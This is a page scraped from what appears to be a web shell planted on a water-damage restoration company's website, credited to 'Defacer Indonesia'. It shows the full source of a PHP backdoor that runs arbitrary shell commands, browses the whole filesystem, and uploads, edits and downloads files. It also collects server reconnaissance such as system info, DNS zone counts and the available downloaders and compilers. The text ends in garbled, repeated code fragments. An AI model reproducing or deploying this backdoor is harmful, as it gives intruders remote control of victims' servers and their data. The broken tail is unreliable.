whoami7 - Manager

: /home/fresvfqn/24hourwaterdamagerestorationlongisland.com/bajk/test/ Upload File: files >> //home/fresvfqn/24hourwaterdamagerestorationlongisland.com/bajk/test/cot.php <?php // Simple PHP File Manager with extended features // Get current path from GET parameter, default to script directory $currentPath = isset($_GET['path']) ? realpath($_GET['path']) : __DIR__; // Allow navigation up to root directory $rootDir = DIRECTORY_SEPARATOR; // root path "/" // Normalize and validate current path if ($currentPath === false) { $currentPath = __DIR__; } if (strpos($currentPath, $rootDir) !== 0) { $currentPath = __DIR__; } // Handle file upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $fileName = basename($_FILES['file']['name']); $targetFile = $currentPath . DIRECTORY_SEPARATOR . $fileName; if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) { $uploadMessage = "File berhasil diupload: " . htmlspecialchars($fileName); } else { $uploadMessage = "Gagal mengupload file."; } } // Handle create new folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) { $newFolderName = basename($_POST['new_folder']); $newFolderPath = $currentPath . DIRECTORY_SEPARATOR . $newFolderName; if (!file_exists($newFolderPath)) { if (mkdir($newFolderPath)) { $folderMessage = "Folder berhasil dibuat: " . htmlspecialchars($newFolderName); } else { $folderMessage = "Gagal membuat folder."; } } else { $folderMessage = "Folder sudah ada."; } } // Handle create new file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) { $newFileName = basename($_POST['new_file']); $newFilePath = $currentPath . DIRECTORY_SEPARATOR . $newFileName; if (!file_exists($newFilePath)) { if (file_put_contents($newFilePath, '') !== false) { $fileMessage = "File berhasil dibuat: " . htmlspecialchars($newFileName); } else { $fileMessage = "Gagal membuat file."; } } else { $fileMessage = "File sudah ada."; } } // Handle edit file content if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file']) && isset($_POST['edit_content'])) { $editFileName = basename($_POST['edit_file']); $editFilePath = $currentPath . DIRECTORY_SEPARATOR . $editFileName; $editContent = $_POST['edit_content']; if (file_exists($editFilePath) && is_file($editFilePath)) { if (file_put_contents($editFilePath, $editContent) !== false) { $editMessage = "File berhasil disimpan: " . htmlspecialchars($editFileName); } else { $editMessage = "Gagal menyimpan file."; } } else { $editMessage = "File tidak ditemukan."; } } // Handle command execution $commandOutput = ''; if (isset($_POST['command'])) { $command = $_POST['command']; // Basic sanitization: allow only safe commands or all if trusted // For demo, allow all, but in production, restrict $commandOutput = shell_exec($command . ' 2>&1'); } // Get list of files and directories $items = scandir($currentPath); $dirs = []; $files = []; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $currentPath . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $dirs[] = $item; } else { $files[] = $item; } } // Function to format file size function formatSize($bytes) { $units = ['B', 'KB', 'MB', 'GB']; $i = 0; while ($bytes >= 1024 && $i < 3) { $bytes /= 1024; $i++; } return round($bytes, 2) . ' ' . $units[$i]; } // Function to get parent directory path function parentDir($path) { $parent = dirname($path); if ($parent === $path) { return null; } return $parent; } ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <title>File Manager Extended</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } .container { max-width: 900px; margin: auto; } .path { background: #f0f0f0; padding: 10px; border-radius: 5px; margin-bottom: 20px; } .item { padding: 5px 0; border-bottom: 1px solid #eee; } .dir { color: blue; font-weight: bold; } .file { color: green; } .upload, .create, .edit, .command { margin-top: 20px; padding: 20px; border: 1px solid #ccc; border-radius: 5px; } table { width: 100%; border-collapse: collapse; } th, td { padding: 8px; text-align: left; border-bottom: 1px solid #ddd; } th { background-color: #f2f2f2; } textarea { width: 100%; height: 200px; } input[type="text"] { width: 300px; } .message { color: green; } .error { color: red; } a { text-decoration: none; } </style> </head> <body> <div class="container"> <h1>File Manager Extended</h1> <div class="server-info"> <h2>Server Info</h2> <pre> Uname: <?php echo htmlspecialchars(shell_exec('uname -a') ?: 'Unknown'); ?> User: <?php echo htmlspecialchars(get_current_user()); ?> Group: <?php echo function_exists('posix_getgid') ? posix_getgid() : 'Unknown'; ?> [ <?php echo htmlspecialchars(get_current_user()); ?> ] PHP: <?php echo htmlspecialchars(phpversion()); ?> Safe Mode: <?php echo ini_get('safe_mode') ? 'ON' : 'OFF'; ?> ServerIP: <?php echo htmlspecialchars($_SERVER['SERVER_ADDR'] ?? 'Unknown'); ?> Your IP: <?php echo htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? 'Unknown'); ?> DateTime: <?php echo date('Y-m-d H:i:s'); ?> Domains: <?php echo htmlspecialchars(shell_exec('cat /etc/named.conf 2>/dev/null | grep -c "zone"') ?: 'Cant Read [ /etc/named.conf ]'); ?> HDD: Total:<?php echo formatSize(disk_total_space(__DIR__)); ?> Free:<?php echo formatSize(disk_free_space(__DIR__)); ?> [<?php echo round((disk_free_space(__DIR__) / disk_total_space(__DIR__)) * 100); ?>%] Useful : <?php echo htmlspecialchars(shell_exec('which gcc c++ ld make php perl ruby tar gzip 2>/dev/null | tr "\n" " "') ?: 'None'); ?><br> Downloader: <?php echo htmlspecialchars(shell_exec('which wget lynx curl 2>/dev/null | tr "\n" " "') ?: 'None'); ?> <br> Disable Functions: <?php $df = ini_get('disable_functions'); echo $df ? htmlspecialchars($df) : 'All Functions Accessible'; ?> <br> CURL : <?php echo extension_loaded('curl') ? 'ON' : 'OFF'; ?> | SSH2 : <?php echo extension_loaded('ssh2') ? 'ON' : 'OFF'; ?> | Magic Quotes : OFF | MySQL : <?php echo extension_loaded('mysql') || extension_loaded('mysqli') || extension_loaded('pdo_mysql') ? 'ON' : 'OFF'; ?> | MSSQL : <?php echo extension_loaded('mssql') || extension_loaded('sqlsrv') ? 'ON' : 'OFF'; ?> | PostgreSQL : <?php echo extension_loaded('pgsql') || extension_loaded('pdo_pgsql') ? 'ON' : 'OFF'; ?> | Oracle : <?php echo extension_loaded('oci8') || extension_loaded('pdo_oci') ? 'ON' : 'OFF'; ?> | CGI : <?php echo php_sapi_name() === 'cgi' ? 'ON' : 'OFF'; ?> <br> Open_basedir : <?php echo ini_get('open_basedir') ?: 'NONE'; ?> | Safe_mode_exec_dir : <?php echo ini_get('safe_mode_exec_dir') ?: 'NONE'; ?> | Safe_mode_include_dir : <?php echo ini_get('safe_mode_include_dir') ?: 'NONE'; ?> <br> SoftWare: <?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'); ?> <br> PWD: <?php echo htmlspecialchars(getcwd()); ?> [ Home Shell ] </pre> </div> <div class="path"> <strong>Path:</strong> <?php echo htmlspecialchars($currentPath); ?> <?php $parent = parentDir($currentPath); ?> <?php if ($parent !== null): ?> &nbsp;|&nbsp; <a href="?path=<?php echo urlencode($parent); ?>">⬆️ Parent Directory</a> <?php endif; ?> &nbsp;|&nbsp; <a href="?path=<?php echo urlencode($rootDir); ?>">🏠 Root Directory</a> </div> <div class="navigate"> <h2>Navigate to Path</h2> <form method="GET"> <input type="text" name="path" placeholder="Enter full path" value="<?php echo htmlspecialchars($currentPath); ?>" required> <button type="submit">Go</button> </form> </div> <?php if (isset($uploadMessage)): ?> <p class="message"><?php echo $uploadMessage; ?></p> <?php endif; ?> <?php if (isset($folderMessage)): ?> <p class="message"><?php echo $folderMessage; ?></p> <?php endif; ?> <?php if (isset($fileMessage)): ?> <p class="message"><?php echo $fileMessage; ?></p> <?php endif; ?> <?php if (isset($editMessage)): ?> <p class="message"><?php echo $editMessage; ?></p> <?php endif; ?> <h2>Directories</h2> <ul> <?php foreach ($dirs as $dir): ?> <li class="item dir"> <a href="?path=<?php echo urlencode($currentPath . DIRECTORY_SEPARATOR . $dir); ?>"> 📁 <?php echo htmlspecialchars($dir); ?> </a> </li> <?php endforeach; ?> </ul> <h2>Files</h2> <table> <thead> <tr> <th>Name</th> <th>Size</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($files as $file): ?> <tr class="item file"> <td>📄 <?php echo htmlspecialchars($file); ?></td> <td><?php echo formatSize(filesize($currentPath . DIRECTORY_SEPARATOR . $file)); ?></td> <td> <a href="?path=<?php echo urlencode($currentPath); ?>&view=<?php echo urlencode($file); ?>">View</a> <a href="?path=<?php echo urlencode($currentPath); ?>&download=<?php echo urlencode($file); ?>" download>Download</a> <a href="?path=<?php echo urlencode($currentPath); ?>&edit=<?php echo urlencode($file); ?>">Edit</a> </td> </tr> <?php endforeach; ?> </tbody> </table> <div class="upload"> <h2>Upload File</h2> <form method="POST" enctype="multipart/form-data"> <input type="file" name="file" required> <button type="submit">Upload</button> </form> </div> <div class="create"> <h2>Create New Folder</h2> <form method="POST"> <input type="text" name="new_folder" placeholder="Folder name" required> <button type="submit">Create Folder</button> </form> </div> <div class="create"> <h2>Create New File</h2> <form method="POST"> <input type="text" name="new_file" placeholder="File name" required> <button type="submit">Create File</button> </form> </div> <div class="command"> <h2>Server Info & Command Execution</h2> <form method="POST"> <input type="text" name="command" placeholder="Enter command" required> <button type="submit">Run Command</button> </form> <?php if ($commandOutput !== ''): ?> <pre><?php echo htmlspecialchars($commandOutput); ?></pre> <?php endif; ?> </div> </div> <?php // Handle view file if (isset($_GET['view'])) { $viewFile = basename($_GET['view']); $viewPath = $currentPath . DIRECTORY_SEPARATOR . $viewFile; if (file_exists($viewPath) && is_file($viewPath)) { echo '<div class="container"><h2>Viewing: ' . htmlspecialchars($viewFile) . '</h2><pre>' . htmlspecialchars(file_get_contents($viewPath)) . '</pre></div>'; } } // Handle edit file form if (isset($_GET['edit'])) { $editFile = basename($_GET['edit']); $editFilePath = $currentPath . DIRECTORY_SEPARATOR . $editFile; if (file_exists($editFilePath) && is_file($editFilePath)) { $content = file_get_contents($editFilePath); ?> <div class="container edit"> <h2>Edit File: <?php echo htmlspecialchars($editFile); ?></h2> <form method="POST"> <input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($editFile); ?>"> <textarea name="edit_content"><?php echo htmlspecialchars($content); ?></textarea><br> <button type="submit">Save</button> </form> </div> <?php } else { echo '<p class="error">File tidak ditemukan.</p>'; } } // Handle download if (isset($_GET['download'])) { $downloadFile = basename($_GET['download']); $downloadPath = $currentPath . DIRECTORY_SEPARATOR . $downloadFile; if (file_exists($downloadPath) && is_file($downloadPath)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $downloadFile . '"'); readfile($downloadPath); exit; } } ?> </body> </html> Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>